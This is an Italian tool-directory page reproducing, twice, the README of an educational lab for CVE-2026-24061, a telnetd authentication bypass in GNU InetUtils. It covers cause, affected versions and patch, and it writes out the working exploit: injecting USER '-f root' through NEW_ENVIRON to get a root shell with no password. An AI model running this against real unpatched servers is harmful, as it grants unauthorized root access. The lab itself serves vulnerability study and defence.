Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
Analisi delle VulnerabilitàExploitPenetration TestingAutenticazioneApprendimento e FormazioneLab e Pratica
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

Laboratorio di riproduzione per CVE-2026-24061: bypass critico dell'autenticazione in GNU InetUtils telnetd. Fornisce un ambiente Vagrant isolato per sfruttare in sicurezza la vulnerabilità di injection NEW_ENVIRON USER.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 mesi faNon ancora revisionato

CVE-2026-24061 — Laboratorio di riproduzione

⚠️ Solo a scopo didattico. Ambiente di laboratorio isolato.

Italiano qui sotto


Riepilogo

Bypass critico dell'autenticazione (CVSS 9.8) in GNU InetUtils telnetd ≤ 2.7. Iniettando -f root come variabile USER tramite l'opzione Telnet NEW_ENVIRON, un utente malintenzionato non autenticato può ottenere una shell root senza alcuna password.

Causa principale

La variabile USER ricevuta dal client durante la negoziazione Telnet viene passata direttamente a /usr/bin/login senza sanitizzazione:

root@kitploit:~
/usr/bin/login -p -f root

Il flag -f dice a login di saltare la verifica della password per l'utente specificato. Questo comportamento è documentato nella RFC 1572 (Sezione 7) come un rischio noto — eppure il bug era presente in inetutils da oltre un decennio.

Versioni affette

GNU InetUtils telnetd 1.9.3 fino a 2.7

Patch

Aggiornare a GNU InetUtils ≥ 2.7-2

Configurazione del laboratorio

Questo laboratorio utilizza Vagrant per fornire una vera VM isolata che esegue la versione vulnerabile di telnetd (inetutils 2.5, compilata dal sorgente), rendendola il più possibile vicina a un ambiente reale.

Requisiti: Vagrant + VirtualBox installati sulla tua macchina.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM avvia con IP 192.168.56.10 e telnetd in ascolto sulla porta 23.

Laboratorio provisionato

Sfruttamento

Dalla tua macchina host:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variabile USER viene iniettata tramite l'opzione Telnet NEW_ENVIRON durante la fase di negoziazione — prima che appaia il prompt di login.

Connesso alla VM Shell root ottenuta

Riferimenti

  • NVD — CVE-2026-24061
  • RFC 1572 — Opzione ambiente Telnet
  • Sorgente GNU InetUtils — telnetd/sys_term.c

Autore

Agokoli



CVE-2026-24061 — Laboratorio di dimostrazione

⚠️ Solo a scopo didattico. Ambiente isolato.

Italiano sopra


Riepilogo

Bypass critico dell'autenticazione (CVSS 9.8) in GNU InetUtils telnetd ≤ 2.7. Iniettando -f root come valore della variabile USER tramite l'opzione Telnet NEW_ENVIRON, un utente malintenzionato non autenticato può ottenere una shell root senza alcuna password.

Causa principale

La variabile USER ricevuta dal client durante la negoziazione Telnet viene passata direttamente a /usr/bin/login senza validazione:

root@kitploit:~
/usr/bin/login -p -f root

Il flag -f indica a login di non verificare la password per l'utente specificato. Questo rischio è documentato nella RFC 1572 (Sezione 7) — eppure il bug è rimasto presente in inetutils per oltre un decennio.

Versioni affette

GNU InetUtils telnetd 1.9.3 a 2.7

Patch

Aggiornare a GNU InetUtils ≥ 2.7-2

Configurazione del laboratorio

Questo laboratorio utilizza Vagrant per fornire una vera VM isolata che esegue la versione vulnerabile di telnetd (inetutils 2.5, compilata dal sorgente), per essere il più vicino possibile a un ambiente reale.

Prerequisiti: Vagrant + VirtualBox installati sulla tua macchina.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM avvia con IP 192.168.56.10 e telnetd in ascolto sulla porta 23.

Laboratorio fornito

Sfruttamento

Dalla tua macchina host:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variabile USER viene iniettata tramite l'opzione NEW_ENVIRON del protocollo Telnet durante la fase di negoziazione — prima ancora che appaia il prompt login:.

Connessione alla VM Shell root ottenuta

Riferimenti

  • NVD — CVE-2026-24061
  • RFC 1572 — Opzione ambiente Telnet
  • Codice sorgente GNU InetUtils — telnetd/sys_term.c

Autore

Agokoli

Scarica lo strumento